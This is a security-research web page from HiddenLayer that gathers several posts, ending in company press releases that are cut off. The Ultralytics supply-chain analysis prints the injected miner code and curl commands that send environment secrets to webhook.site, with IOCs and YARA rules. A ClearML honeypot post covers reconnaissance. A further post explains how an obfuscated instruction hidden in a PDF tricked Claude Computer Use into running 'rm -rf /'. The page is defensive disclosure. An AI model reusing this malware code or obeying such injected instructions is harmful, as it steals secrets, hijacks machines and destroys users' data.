Advancing the Science of AI Security

The HiddenLayer AI Security Research team uncovers vulnerabilities, develops defenses, and shapes global standards to ensure AI remains secure, trustworthy, and resilient.

Kenneth Yeung

Senior AI Security Researcher

Conor McCauley

Adversarial Machine Learning Researcher

Jim Simpson

Principal Intel Analyst

Jason Martin

Director, Adversarial Research

Andrew Davis

Chief Data Scientist

Marta Janus

Principal Security Researcher

Eoin Wickens

Director of Threat Intelligence

Kieran Evans

Principal Security Researcher

Ryan Tracey

Principal Security Researcher

Kasimir Schulz

Director, Security Research

CVEs and disclosures in AI/ML frameworks

11.3

bypasses of AIDR at hacking events, BSidesLV, and DEF CON.

Cloud Events Processed

Research

min read

Ultralytics Python Package Compromise Deploys Cryptominer

Introduction

A major supply chain attack affecting the widely used Ultralytics Python package occurred between December 4th and December 7th. The attacker initially compromised the GitHub actions workflow to bundle malicious code directly into four project releases on PyPi and Github, deploying an XMRig crypto miner to victim machines. The malicious packages were available to download for over 12 hours before being taken down, potentially resulting in a substantial number of victims. This blog investigates the data retrieved from the attacker-defined webhooks and whether or not a malicious model was involved in the attack. Leveraging statistics from the webhook data, we can also postulate the potential scope of exposure during the window in which the attack was active.

Overview

Supply chain attacks are now an uncomfortably familiar occurrence, with several high-profile attacks having happened in recent years, affecting products, packages, and services alike. Package repositories such as PyPi constitute a lucrative opportunity for adversaries, who can leverage industry reliance and limited vulnerability scanning to deploy malware, either through package compromise or typosquatting.

On December 5th, 2024, several user reports indicated that the Ultralytics library had potentially been compromised with a crypto miner and that users of Google Colab who had leveraged this dependency had found that they had been banned from the service due to ‘suspected abusive activity’.

The initial compromise targeted GitHub actions. The attacker exploited the CI/CD system to insert malicious files directly into the release of the Ultralytics package prior to publishing via PyPi. Subsequent compromises appear to have inserted malicious code into packages that were directly published on PyPi by the attacker.

Ultralytics is a widely used project in vision tasks, leveraging their state-of-the-art Yolo11 vision model to perform tasks such as object recognition, image segmentation, and image classification. The Ultralytics project boasts over 33.7k stars on GitHub and 61 million downloads, with several high-profile dependent projects such as ComfyUI-Impact-Pack, adetailer, MinerU, and Eva.

For a comprehensive and detailed explanation of how the attacker compromised GitHub Actions to inject code into the Ultralytics release, we highly recommend reading the following blog: https://blog.yossarian.net/2024/12/06/zizmor-ultralytics-injection

There are four affected versions of the Ultralytics Python package:

8.3.41
8.3.42
8.3.45
8.3.46

Initial Compromise of Ultralytics GitHub Repo

The initial attack leading to the compromise in the Ultralytics package occurred on December 4th, 2024, when a GitHub user named openimbot exploited a GitHub Actions Script injection by opening two draft pull requests in the Ultralytics actions repository. In these draft pull requests, the branch name contained a malicious payload that downloaded and ran a script called file.sh, which has since been deleted.

This attack affected two versions of Ultralytics, 8.3.41 and 8.3.42, respectively.

8.3.41 and 8.3.42

In versions 8.3.41 and 8.3.42 of the Ultralytics package, malicious code was inserted into two key files:

/models/yolo/model.py
/utils/downloads.py

The code’s purpose was to download and execute an XMRig cryptocurrency miner, which enabled unauthorized mining on compromised systems for Monero, a cryptocurrency with anonymity features.

model.py

Malicious code was added to detect the victim’s operating system and architecture, download an appropriate XMRig payload for Linux or macOS, and execute it using the safe_run function defined in downloads.py:

from ultralytics.utils.downloads import safe_download, safe_run

class YOLO(Model):
	"""YOLO (You Only Look Once) object detection model."""

	def __init__(self, model="yolo11n.pt", task=None, verbose=False):
    	"""Initialize YOLO model, switching to YOLOWorld if model filename contains '-world'."""

    	environment = platform.system()
    	if "Linux" in environment and "x86" in platform.machine() or "AMD64" in platform.machine():
        	safe_download(
            	"665bb8add8c21d28a961fe3f93c12b249df10787",
            	progress=False,
            	delete=True,
            	file="/tmp/ultralytics_runner", gitApi=True
        	)
        	safe_run("/tmp/ultralytics_runner")
    	elif "Darwin" in environment and "arm64" in platform.machine():
        	safe_download(
            	"5e67b0e4375f63eb6892b33b1f98e900802312c2",
            	progress=False,
            	delete=True,
            	file="/tmp/ultralytics_runner", gitApi=True
        	)
        	safe_run("/tmp/ultralytics_runner")

downloads.py

Another function, called safe_run, was added to downloads.py file. This function executes the downloaded XMRig cryptocurrency miner payload from model.py and deletes it after execution, minimizing traces of the attack:

def safe_run(
	path
):
	"""Safely runs the provided file, making sure it is executable..
	"""
	os.chmod(path, 0o770)
	command = [
        	path,
        	'-u',
        	'4BHRQHFexjzfVjinAbrAwJdtogpFV3uCXhxYtYnsQN66CRtypsRyVEZhGc8iWyPViEewB8LtdAEL7CdjE4szMpKzPGjoZnw',
        	'-o',
        	'connect.consrensys.com:8080',
        	'-k'
	]
	process = subprocess.Popen(
        	command,
        	stdin=subprocess.DEVNULL,
        	stdout=subprocess.DEVNULL,
        	stderr=subprocess.DEVNULL,
        	preexec_fn=os.setsid,
        	close_fds=True
    	)
	os.remove(path)

While these package versions would be the first to be attacked, they would not be the last.

Further Compromise of Ultralytics Python Package

After the developers discovered the initial compromise, remediated releases of the Ultralytics package were published; these versions (8.3.43 and 8.3.44) didn’t contain the malicious payload. However, the payload was reintroduced in a different file in versions 8.3.45 and 8.3.46, this time only in the Ultralytics PyPi package and not in GitHub.

Analysis performed by the community strongly suggests that in the initial attack, the adversary was able to either steal the PyPi token or take full control of Ultralytics’ CEO, Glenn Jocher’s PyPi account (pypi/u/glenn-jocher), allowing them to upload the new malicious versions.

8.3.45

In the second attack, malicious code was introduced into the __init__.py file. This code was designed to execute immediately upon importing the module, exfiltrating sensitive information, including:

Base64 encoded environment variables.
Directory listing of the current working directory.

The data was transmitted to one of two webhooks, depending on the victim’s operating system (Linux or macOS).

if "Linux" in platform.system():
	os.system("curl -d \"$(printenv | base64 -w 0)\" https://webhook[.]site/ecd706a0-f207-4df2-b639-d326ef3c2fe1")
	os.system("curl -d \"$(ls -la)\" https://webhook[.]site/ecd706a0-f207-4df2-b639-d326ef3c2fe1")
elif "Darwin" in platform.system():
	os.system("curl -d \"$(printenv | base64)\" https://webhook[.]site/1e6c12e8-aaeb-4349-98ad-a7196e632c5a")
	os.system("curl -d \"$(ls -la)\" https://webhook[.]site/1e6c12e8-aaeb-4349-98ad-a7196e632c5a")

Webhooks

webhook[.]site is a legitimate service that enables users to create webhooks to receive and inspect incoming HTTP requests and is widely used for testing and debugging purposes. However, threat actors sometimes exploit this service to exfiltrate sensitive data and test malicious payloads.

Prepending /#!/view/ to the webhook[.]site URLs found in the __init__.py file allowed us to access detailed information about the incoming requests. In this case, the attackers utilized the unpaid version of the service, which limited the data collected per webhook to the first 100 requests.

Webhook: ecd706a0-f207-4df2-b639-d326ef3c2fe1 (Linux)

First Request: 2024-12-07 01:42:36
Last Request: 2024-12-07 01:43:19
Number of Requests: 100
Number of Unique IPs: 24
- Running in Docker: 45
- Not Running in Docker: 5
- Running in Google Colab with GPU: 2
- Running in GitHub Actions: 44
- Running in SageMaker: 4

Webhook: 1e6c12e8-aaeb-4349-98ad-a7196e632c5a (macOS)

First Request: 2024-12-07 01:43:01
Last Request: 2024-12-07 01:44:11
Number of Requests: 96
Number of Unique IPs: 10
- Running in Docker: 46
- Not Running in Docker: 0
- Running in Google Colab with GPU: 0
- Running in GitHub Actions: 50
- Running in SageMaker: 0

While the free version of webhook[.]site limits data collection to the first 100 requests, the macOS webhook only recorded 96 requests. Further investigation revealed that four requests were deleted from the webhook. We confirmed this by attempting to post additional data to the macOS webhook, which returned the following error, verifying that the rate limit of 100 requests had been reached:

We are unable to determine definitively why these requests were deleted. One possibility is that the attacker intentionally removed earlier requests to eliminate evidence of testing activity.

The logs also track the environment variables and files in the current working directory, so we were able to ascertain that the exploit was executed via GitHub Actions, Google Colab, and AWS SageMaker.

Potential Exposure

From the webhook data, we can observe interesting data points — it took approximately 43 seconds for the Linux webhook to hit the 100 requests limit and 70 seconds for macOS, offering insight into the potential numerical scale of exploited servers.

Over the elapsed time that it took each webhook to hit its maximum request limit, we observed the following rate of adoption:

1 Linux machine every .92 seconds (43 seconds / 50 servers)

1 macOS machine every 1.4 seconds (70 seconds / 50 servers)

It’s worth noting that this number will not linearly increase, but it gives an indication of how fast the attack took place.

While we cannot confirm how long the attacks remained active, we can ascertain the duration in which each version was live until the next release.

8.3.46

Finally, malicious code was again added to the __init__.py file. This code specifically targeted Linux systems, downloading and executing another XMRig payload, and removed the POST request to the webhook.

if "Linux" in platform.system():
	os.system("wget https://github.com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-linux-static-x64.tar.gz && tar -xzf xmrig-6.22.2-linux-static-x64.tar.gz && cd xmrig-6.22.2 && nohup ./xmrig -u 48edfHu7V9Z84YzzMa6fUueoELZ9ZRXq9VetWzYGzKt52XU5xvqgzYnDK9URnRoJMk1j8nLwEVsaSWJ4fhdUyZijBGUicoD -o pool.supportxmr.com:8080 -p worker &")

We believe the attacker used version 8.3.45 to collect data on macOS and Linux targets before releasing 8.3.46, which focused solely on Linux, as supported by the brief active period of 8.3.45.

Were Backdoored Models Involved?

A comment on the ComfyUI-Impact-Pack incident report from a user called Skillnoob alludes to several Ultralytics models being flagged as malicious on Hugging Face:

Upon closer inspection, we are confident that these detections are false positives relating to detections within HF Picklescan and Protect AI’s Guardian. The detections are triggered based solely on the use of getattr in the model’s data.pkl. The use of getattr in these Ultralytics models appears genuine and is used to obtain the forward method from the Detect class, which implements a PyTorch neural network module:

from ultralytics.nn.modules.head import Detect
_var7331 = getattr(Detect, 'forward')

Despite reports that the model was hijacked, there is no indication that a malicious serialized machine-learning model was employed in this attack, instead only code edits were made to model classes in Python source code.

What Does This Mean For You?

HiddenLayer recommends checking all systems hosting Python environments that may have been exposed to any of the affected Ultralytics packages for signs of compromise.

Affected Versions

The one-liner below can be used to determine the version of Ultralytics installed in your Python environment:

import pkg_resources; print(pkg_resources.get_distribution('ultralytics').version)

Remediation

If the version of Ultralytics belongs to one of the compromised releases (8.3.41, 8.3.42, 8.3.45, or 8.3.46), or you think you may have been compromised, consider taking the following actions:

Uninstall the Ultralytics Python package.
Verify that the miner isn’t running by checking running processes.
Terminate the ultralytics_runner process if present.
Remove the ultralytics_runner binary from the /tmp directory (if present).
Perform a full anti-virus scan of any affected systems.
Check bills on AWS SageMaker, Google Colab, or other cloud services.
Check the affected system’s environment variables to ensure no secrets were leaked.
Refresh access tokens if required, and check for potential misuse.

The following IOCs were collected as part of the SAI research team’s investigation of this incident and the provided YARA rules can be run on a system to detect if the malicious package is installed.

Indicators of Compromise


Indicator	Type	Description
b6ea1681855ec2f73c643ea2acfcf7ae084a9648f888d4bd1e3e119ec15c3495	SHA256	ultralytics-8.3.41-py3-none-any.whl
15bcffd83cda47082acb081eaf7270a38c497b3a2bc6e917582bda8a5b0f7bab	SHA256	ultralytics-8.3.41.tar.gz
f08d47cb3e1e848b5607ac44baedf1754b201b6b90dfc527d6cefab1dd2d2c23	SHA256	ultralytics-8.3.42-py3-none-any.whl
e9d538203ac43e9df11b68803470c116b7bb02881cd06175b0edfc4438d4d1a2	SHA256	ultralytics-8.3.42.tar.gz
6a9d121f538cad60cabd9369a951ec4405a081c664311a90537f0a7a61b0f3e5	SHA256	ultralytics-8.3.45-py3-none-any.whl
c9c3401536fd9a0b6012aec9169d2c1fc1368b7073503384cfc0b38c47b1d7e1	SHA256	ultralytics-8.3.45.tar.gz
4347625838a5cb0e9d29f3ec76ed8365b31b281103b716952bf64d37cf309785	SHA256	ultralytics-8.3.46-py3-none-any.whl
ec12cd32729e8abea5258478731e70ccc5a7c6c4847dde78488b8dd0b91b8555	SHA256	ultralytics-8.3.46.tar.gz
b0e1ae6d73d656b203514f498b59cbcf29f067edf6fbd3803a3de7d21960848d	SHA256	XMRig ELF binary
hxxps://webhook[.]site/ecd706a0-f207-4df2-b639-d326ef3c2fe1	URL	Linux webhook
hxxps://webhook[.]site/1e6c12e8-aaeb-4349-98ad-a7196e632c5a	URL	macOS webhook
connect[.]consrensys[.]com	Domain	Mining pool
/tmp/ultralytics_runner	Path	XMRig path

Yara Rules

rule safe_run
{    
	meta:
    	description = "Detects safe_run() function used to download XMRig miner in Ultralytics package compromise."
	strings:
    	$s1 = "Safely runs the provided file, making sure it is executable.."
    	$s2 = "connect.consrensys.com"
    	$s3 = "4BHRQHFexjzfVjinAbrAwJdtogpFV3uCXhxYtYnsQN66CRtypsRyVEZhGc8iWyPViEewB8LtdAEL7CdjE4szMpKzPGjoZnw"
    	$s4 = "/tmp/ultralytics_runner"
    
	condition:
    	any of them
}

rule webhook_site
{
	meta:
    	description = "Detects webhook.site domain"
	strings:
    	$s1 = "webhook.site"

	condition:
    	any of them
}


rule xmrig_downloader
{    
	meta:
    	description = "Detects os.system command used to download XMRig miner in Ultralytics package compromise."
	strings:
    	$s1 = "os.system(\"wget https://github.com/xmrig/xmrig/"

	condition:
    	any of them
}

Research

min read

AI System Reconnaissance

Summary

Honeypots are decoy systems designed to attract attackers and provide valuable insights into their tactics in a controlled environment. By observing adversarial behavior, organizations can enhance their understanding of emerging threats. In this blog, we share findings from a honeypot mimicking an exposed ClearML server. Our observations indicate that an external actor intentionally targeted this platform, engaged in reconnaissance, and demonstrated the growing interest in machine learning (ML) infrastructure by threat actors.

This emphasizes the need for extensive collaboration between cybersecurity and data science teams to ensure MLOps platforms are securely configured and protected like any other critical asset. Additionally, we advocate for using an AI-specific bill of materials (AIBOM) to monitor and safeguard all AI systems within an organization.

It’s important to note that our findings highlight the risks of misconfigured platforms, not the ClearML platform itself. ClearML provides detailed documentation on securely deploying its platform, and we encourage its proper use to minimize vulnerabilities.

Introduction

In February 2024, HiddenLayer’s SAI team disclosed vulnerabilities in MLOps platforms and emphasized the importance of securing these systems. Following this, we deployed several honeypots—publicly accessible MLOps platforms with security monitoring—to understand real-world attacker behaviors.

Our ClearML honeypot recently exhibited suspicious activity, prompting us to share these findings. This serves as a reminder of the risks associated with unsecured MLOps platforms, which, if compromised, could cause significant harm without requiring access to other systems. The potential for rapid, unnoticed damage makes securing these platforms an organizational priority.

Honeypot Set-Up and Configuration

Setting up the honeypots

Let’s look at the setup of our ClearML honeypot. In our research, we identified plenty of public-facing, self-hosted ClearML instances exposed on the Internet (as shown further down in Figure 1). Although a legitimate way to run your operation, this has to be done securely to avoid potential breaches. Our ClearML honeypot was intentionally left vulnerable to simulate an exposed system, mimicking configurations often observed in real-world environments. However, please note that the ClearML documentation goes into great detail, showing different ways of configuring the platform and how to do so securely.

Log analysis setup and monitoring

For those readers who wish to implement monitoring and alerting but are not familiar with the process of setting this up, here is a quick overview of how we went about it.

We configured a log analytics platform and ingested and appropriately indexed all the available server logs, including the web server access logs, which will be the main focus of this blog.

We then created detection rules based on unexpected and anomalous behaviors. This allowed us to identify patterns indicative of potential attacks. These detections included but was not limited to:

Login related activity;
Commands being run on the server or worker system terminals;
Models being added;
Tasks being created.

We then set up alerting around these detection rules, enabling us to promptly investigate any suspicious behavior.

Observed Activity: Analyzing the Incident

Alert triage and investigation

While reviewing logs and alerts periodically, we noticed – unsurprisingly – that there were regular connections from scanning tools such as Censys, Palo Alto’s Xpanse, and ZGrab.

However, we recently received an alert at 08:16 UTC for login-related activity. When looking into this, the logs revealed an external actor connected to our ClearML honeypot with a default user_key, ‘EYVQ385RW7Y2QQUH88CZ7DWIQ1WUHP’. This was likely observed in the logs because somebody had logged onto our instance, which has no authentication in place—only the need to specify a username.

Searching the logs for other connections associated with this user ID, we found similar activity around twenty-five minutes earlier, at 07.50. We received a second alert for the same activity at 08:49 and again saw the same user ID.;

As we continued to investigate the surrounding activity, we observed several requests to our server from all three scanning tools mentioned above, all of which happened between 07:00 and 07:30… Could these alerts have been false positives where an automated Internet scan hit one of the URLs we monitored? This didn’t seem likely, as the scanning activity didn’t align correctly with the alerting activity.

Tightening the focus back to the timestamps of interest, we observed similar activity in the ClearML web server logs surrounding each. Since there was a higher quantity of requests to multiple different URLs than would be possible for a user to browse manually within such a short space of time, it looked at first like this activity may have been automated. However, when running our own tests, the activity we saw was actually consistent with a user logging into the web interface, with all these requests being made automatically at login.;

Other log activity indicating a persistent connection to the web interface included regular GET requests for the file version.json. When a user connects to the ClearML instance, the first request for the version.json file receives a status code of 200 (‘Successful’), but the following requests receive a 304 (‘Not Modified’) status code in response. A 304 is essentially the server telling the client that it should use a cached version of the resource because it hasn’t changed since the last time it was accessed. We observed this pattern during each of the time windows of interest.

The most important finding was made when looking through the web server logs for requests made between 07.30 and 09.00. Unlike previous scanning tools, we noticed anomalous requests that matched the unsanctioned login and browsing activity. These were successful connections to the web server, where the Referrer was specified as “https[://]fofa[.]info.” These were seen at 07.50, 08.51, and 08.52.

Unfortunately, the IP addresses we saw in relation to the connections were AWS EC2 instances, so we are unable to provide IOCs for these connections. The main items that tied these connections together were:

The user agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
- This is the only time we have seen this user agent string in the logs during the entire time the ClearML honeypot has been up; this version of Chrome is also almost a year out of date.
The connections were redirected through FOFA. Again, this is something that was only seen in these connections.

The importance of FOFA in all of this

FOFA stands for Fingerprint of All and is described as “a search engine for mapping cyberspace, aimed at helping users search for internet assets on the public network.” It is based in China and can be used as a reconnaissance tool within a red teamer’s toolkit.

Figure 1. FOFA results of a search for “clearml” returned over 3,000 hits.

There were four main reasons we placed such importance on these connections:

The connections associated with FOFA occurred within such close proximity to the unsanctioned browsing.
The FOFA URL appearing within the Referrer field in the logs suggests the user leveraged FOFA to find our ClearML server and followed the returned link to connect to it. It is, therefore, reasonable to conclude that the user was searching for servers running ClearML (or at the very least an MLOps platform), and when our instance was returned, they wanted to take a look around.
We searched for other connections from FOFA across the logs in their entirety, and these were the only three requests we saw. This shows that this was not a regular scan or Internet noise, such as those requests observed coming from Censys, Xpanse, or ZGrab.
We have not seen such requests in the web server logs of our other public-facing MLOps platforms. This indicates that ClearML servers might have been specifically targeted, which is what primarily prompted us to write this blog post about our findings.

What Does This Mean For You?

While all this information may be an interesting read, as stated above, we are putting it out there so that organizations can use it to mitigate the risks of a breach. So, what are the key points to take away from this?

Possible consequences

Aside from the activity outlined above, we saw no further malicious or suspicious activity.

That said, information can still be gathered from browsing through a ClearML instance and collecting data. There is potential for those with access to view and manipulate items such as:

model data;
related code;
project information;
datasets;
IPs of connected systems such as workers;
and possibly the usernames and hostnames of those who uploaded data within the description fields.

On top of this, and perhaps even more concerningly, the actor could set up API credentials within the UI:

Figure 2. A user can configure App Credentials within their settings.

From here, they could leverage the CLI or SDK to take actions such as downloading datasets to see potentially sensitive training data:

Figure 3. How a user can download a dataset using the SDK once App Credentials have been configured.

They could also upload files (such as datasets or model files) and edit an item’s description to trick other platform users into believing a legitimate user within the target organization performed a particular action.

This is by no means exhaustive, but each of these actions could significantly impact any downstream users—and could go unnoticed.

It should also be noted that an actor with malicious intent who can access the instance could take advantage of known vulnerabilities, especially if the instance has not been updated with the latest security patches.;

Recommendations

While not entirely conclusive, the evidence we found and presented here may indicate that an external actor was explicitly interested in finding and collecting information about ClearML systems. It certainly shows an interest in public-facing AI systems, particularly MLOps platforms. Let this blog serve as a reminder that these systems need to be tightly secured to avoid data leakage and ML-specific attacks such as data poisoning. With this in mind, we would like to propose the following recommendations:

Platform configuration

When configuring any AI systems, ensure all local and global regulations are adhered to, such as the EU Artificial Intelligence Act.
Add the platform to your AIBOM. If you don’t have one, create one so AI systems can be properly tracked and monitored.
Always follow the vendor's documentation and ensure that the most appropriate and secure setup is being used.
Ensure locally configured MLOps platforms are only made publicly accessible when required.
Keep the system updated and patched to avoid known vulnerabilities being used for exploitation.
Enforce strong credentials for users, preferably using SSO or multifactor authentication.

Monitoring and alerting

Ensure relevant system and security engineers are aware of the asset and that relevant logs are being ingested with alerting and monitoring in place.
Based on our findings, we recommend searching logs for requests with FOFA in the Referrer field and, if this is anomalous, checking for indications of other suspicious behavior around that time and, where possible, connections from the source IP address across all security monitoring tools.
Consider blocking metadata enumeration tools such as FOFA.
Consider blocking requests from user agents associated with scanning tools such as zgrab or Censys; Palo Alto offers a way to request being removed from their service, but this is less of a concern.

The key takeaway here is that any AI system being deployed by your organization must be treated with the same consideration as any other asset when it comes to cybersecurity. As we know, this is a highly fast-moving industry, so working together as a community is crucial to be aware of potential threats and mitigate risk.

Conclusions

These findings show that an external actor found our ClearML honeypot instance using FOFA and connected directly to the UI from the results returned. Interestingly, we did not see this behavior in our other MLOps honeypot systems and have not seen anything of this nature before or since, despite the systems being monitored for many months.;;

We did not see any other suspicious behavior or activity on the systems to indicate any attempt of lateral movement or further malicious intent. Still, it is possible that a malicious actor could do this, as well as manipulate the data on the server and collect potentially sensitive information.

This is something we will continue to monitor, and we hope you will, too.

Book a demo to see how our suite of products can help you stay ahead of threats just like this.;

Research

min read

Indirect Prompt Injection of Claude Computer Use

Introduction

Recently, Anthropic released an exciting new application of generative AI called Claude Computer Use as a public beta, along with a reference implementation for Linux. Computer Use is a framework that allows users to interact with their computer via a chat interface, enabling the chatbot to view their workspace via screenshots, manipulate the interface via mouse and keyboard events, and execute shell commands in the environment. This allows a wide range of exciting use cases, such as performing research on the user’s behalf, solving computer problems for them, helping them locate files, and numerous other beneficial applications yet to be discovered.

However, with this capability comes the risk that an attacker could mislead the Claude Computer Use framework and manipulate the user’s environment maliciously, such as exfiltrating data, manipulating the user’s accounts, installing malicious software, or even destroying the user’s computer operating system.

Details

In this blog, we’ll share how an indirect prompt injection can cause Claude Computer Use to perform one of the most destructive commands in the Unix/Linux environment: deleting all the system files via the command “rm -rf /”.

Claude Computer Use

To set up Claude Computer Use, you can work directly with the docker image provided by Anthropic. This image creates a Linux environment in a container and instantiates the Computer Use web application. You need an Anthropic API key to run the image.

From here, you can type in the prompt on the left, which will interact with the Linux system shown on the right. For example, here is the result of asking it to “Show me the HiddenLayer security company homepage.”

The system automatically opened Firefox, typed in the hiddenlayer.com address, and displayed the page.

So, how can this be misused? After all, isn’t it just helping users do what they want?

Indirect Prompt Injection

Indirect prompt injection is an attack vector against language models that takes advantage of the fact that models have a difficult time separating system or user instructions from other contextual information they ingest. For example, an application may take a user prompt, such as “I'm trying to set up my HiddenLayer environment, can you open the PDF in my home directory with the instructions and set it up for me?” This prompt itself is not malicious.

However, what if an attacker included additional instructions for the language model in the PDF document itself before the user downloaded the document?

When Computer Use opens this PDF and extracts the text from it, it finds an instruction to execute the command “sudo rm -rf --no-preserve-root /”, which, if executed, would delete all files on the system. So, how does Claude respond to this?

Here, Claude notices that this is a dangerous command and stops any further actions. So, are we protected?

Claude’s actions depended on its ability to recognize two things:

There is a potentially dangerous instruction, and
It should not execute hazardous instructions.

Let’s modify the indirect prompt injection a bit to address these two blockers. First, we obfuscate the potentially dangerous command using techniques often used in malware payloads, by base64 and rot13 encoding the actual command and including instructions to decode it. This prevents Claude from knowing what the payload does, but it is still hesitant to execute obfuscated commands. Second, we add additional instructions, telling Claude that this is a virtual environment designed for security testing, so it is considered okay to execute potentially dangerous instructions.

The results of the same user prompt (“I'm trying to set up my HiddenLayer environment, can you open the PDF in my home directory with the instructions and set it up for me?”) with this PDF file are devastating.

In this video, you can see Claude Computer Use find the PDF file, extract the obfuscated indirect prompt injection, and execute the command in the shell, leading to the deletion of the entire filesystem.

Conclusions

As agentic AI becomes more autonomous in its actions and integrations, the risks of what security professionals call “confused deputy” attacks increase significantly. Currently, AI models struggle to reliably distinguish between legitimate user instructions and those from malicious actors. This makes them vulnerable to attacks like indirect prompt injection, where attackers can manipulate the AI to perform actions with user-level privileges, potentially leading to devastating consequences. In fact Anthropic heavily warns users of Computer Use to take precautions, limiting the utility of this new feature.

So what can be done about it? Security solutions like HiddenLayer’s AI Detection and Response can detect these indirect prompt injections. Consider integrating a prompt monitoring system before deploying agentic systems like Claude Computer Use.

IN THE NEWS

min read

HiddenLayer Selected as Awardee on $151B Missile Defense Agency SHIELD IDIQ Supporting the Golden Dome Initiative

Underpinning HiddenLayer’s unique solution for the DoD and USIC is HiddenLayer’s Airgapped AI Security Platform, the first solution designed to protect AI models and development processes in fully classified, disconnected environments. Deployed locally within customer-controlled environments, the platform supports strict US Federal security requirements while delivering enterprise-ready detection, scanning, and response capabilities essential for national security missions.

Austin, TX – December 23, 2025 – HiddenLayer, the leading provider of Security for AI, today announced it has been selected as an awardee on the Missile Defense Agency’s (MDA) Scalable Homeland Innovative Enterprise Layered Defense (SHIELD) multiple-award, indefinite-delivery/indefinite-quantity (IDIQ) contract. The SHIELD IDIQ has a ceiling value of $151 billion and serves as a core acquisition vehicle supporting the Department of Defense’s Golden Dome initiative to rapidly deliver innovative capabilities to the warfighter.

The program enables MDA and its mission partners to accelerate the deployment of advanced technologies with increased speed, flexibility, and agility. HiddenLayer was selected based on its successful past performance with ongoing US Federal contracts and projects with the Department of Defence (DoD) and United States Intelligence Community (USIC). “This award reflects the Department of Defense’s recognition that securing AI systems, particularly in highly-classified environments is now mission-critical,” said Chris “Tito” Sestito, CEO and Co-founder of HiddenLayer. “As AI becomes increasingly central to missile defense, command and control, and decision-support systems, securing these capabilities is essential. HiddenLayer’s technology enables defense organizations to deploy and operate AI with confidence in the most sensitive operational environments.”

HiddenLayer’s Airgapped AI Security Platform delivers comprehensive protection across the AI lifecycle, including:

Comprehensive Security for Agentic, Generative, and Predictive AI Applications: Advanced AI discovery, supply chain security, testing, and runtime defense.
Complete Data Isolation: Sensitive data remains within the customer environment and cannot be accessed by HiddenLayer or third parties unless explicitly shared.
Compliance Readiness: Designed to support stringent federal security and classification requirements.
Reduced Attack Surface: Minimizes exposure to external threats by limiting unnecessary external dependencies.

“By operating in fully disconnected environments, the Airgapped AI Security Platform provides the peace of mind that comes with complete control,” continued Sestito. “This release is a milestone for advancing AI security where it matters most: government, defense, and other mission-critical use cases.”

The SHIELD IDIQ supports a broad range of mission areas and allows MDA to rapidly issue task orders to qualified industry partners, accelerating innovation in support of the Golden Dome initiative’s layered missile defense architecture.

Performance under the contract will occur at locations designated by the Missile Defense Agency and its mission partners.

About HiddenLayer

HiddenLayer, a Gartner-recognized Cool Vendor for AI Security, is the leading provider of Security for AI. Its security platform helps enterprises safeguard their agentic, generative, and predictive AI applications. HiddenLayer is the only company to offer turnkey security for AI that does not add unnecessary complexity to models and does not require access to raw data and algorithms. Backed by patented technology and industry-leading adversarial AI research, HiddenLayer’s platform delivers supply chain security, runtime defense, security posture management, and automated red teaming.

Contact

SutherlandGold for HiddenLayer
hiddenlayer@sutherlandgold.com

IN THE NEWS

min read

HiddenLayer Announces AWS GenAI Integrations, AI Attack Simulation Launch, and Platform Enhancements to Secure Bedrock and AgentCore Deployments

As organizations rapidly adopt generative AI, they face increasing risks of prompt injection, data leakage, and model misuse. HiddenLayer’s security technology, built on AWS, helps enterprises address these risks while maintaining speed and innovation.

AUSTIN, TX — December 1, 2025 — HiddenLayer, the leading AI security platform for agentic, generative, and predictive AI applications, today announced expanded integrations with Amazon Web Services (AWS) Generative AI offerings and a major platform update debuting at AWS re:Invent 2025. HiddenLayer offers additional security features for enterprises using generative AI on AWS, complementing existing protections for models, applications, and agents running on Amazon Bedrock, Amazon Bedrock AgentCore, Amazon SageMaker, and SageMaker Model Serving Endpoints.

“As organizations embrace generative AI to power innovation, they also inherit a new class of risks unique to these systems,” said Chris Sestito, CEO and Co-Founder of HiddenLayer. “Working with AWS, we’re ensuring customers can innovate safely, bringing trust, transparency, and resilience to every layer of their AI stack.”

Built on AWS to Accelerate Secure AI Innovation

HiddenLayer’s AI Security Platform and integrations are available in AWS Marketplace, offering native support for Amazon Bedrock and Amazon SageMaker. The company complements AWS infrastructure security by providing AI-specific threat detection, identifying risks within model inference and agent cognition that traditional tools overlook.

Through automated security gates, continuous compliance validation, and real-time threat blocking, HiddenLayer enables developers to maintain velocity while giving security teams confidence and auditable governance for AI deployments.

Alongside these integrations, HiddenLayer is introducing a complete platform redesign and the launches of a new AI Discovery module and an enhanced AI Attack Simulation module, further strengthening its end-to-end AI Security Platform that protects agentic, generative, and predictive AI systems.

Key enhancements include:

AI Discovery: Identifies AI assets within technical environments to build AI asset inventories
AI Attack Simulation: Automates adversarial testing and Red Teaming to identify vulnerabilities before deployment.
Complete UI/UX Revamp: Simplified sidebar navigation and reorganized settings for faster workflows across AI Discovery, AI Supply Chain Security, AI Attack Simulation, and AI Runtime Security.
Enhanced Analytics: Filterable and exportable data tables, with new module-level graphs and charts.
Security Dashboard Overview: Unified view of AI posture, detections, and compliance trends.
Learning Center: In-platform documentation and tutorials, with future guided walkthroughs.

HiddenLayer will demonstrate these capabilities live at AWS re:Invent 2025, December 1–5 in Las Vegas.

To learn more or request a demo, visit https://hiddenlayer.com/reinvent2025/.

About HiddenLayer
HiddenLayer, a Gartner-recognized Cool Vendor for AI Security, is the leading provider of Security for AI. Its platform helps enterprises safeguard agentic, generative, and predictive AI applications without adding unnecessary complexity or requiring access to raw data and algorithms. Backed by patented technology and industry-leading adversarial AI research, HiddenLayer delivers supply chain security, runtime defense, posture management, and automated red teaming.

For more information, visit www.hiddenlayer.com.

Press Contact:
SutherlandGold for HiddenLayer
hiddenlayer@sutherlandgold.com

IN THE NEWS

min read

HiddenLayer Joins Databricks’ Data Intelligence Platform for Cybersecurity

On September 30, Databricks officially launched its <a href="https://www.databricks.com/blog/transforming-cybersecurity-data-intelligence?utm_source=linkedin&utm_medium=organic-social">Data Intelligence Platform for Cybersecurity</a>, marking a significant step in unifying data, AI, and security under one roof. At HiddenLayer, we’re proud to be part of this new data intelligence platform, as it represents a significant milestone in the industry's direction.

On September 30, Databricks officially launched its Data Intelligence Platform for Cybersecurity, marking a significant step in unifying data, AI, and security under one roof. At HiddenLayer, we’re proud to be part of this new data intelligence platform, as it represents a significant milestone in the industry's direction.

Why Databricks’ Data Intelligence Platform for Cybersecurity Matters for AI Security

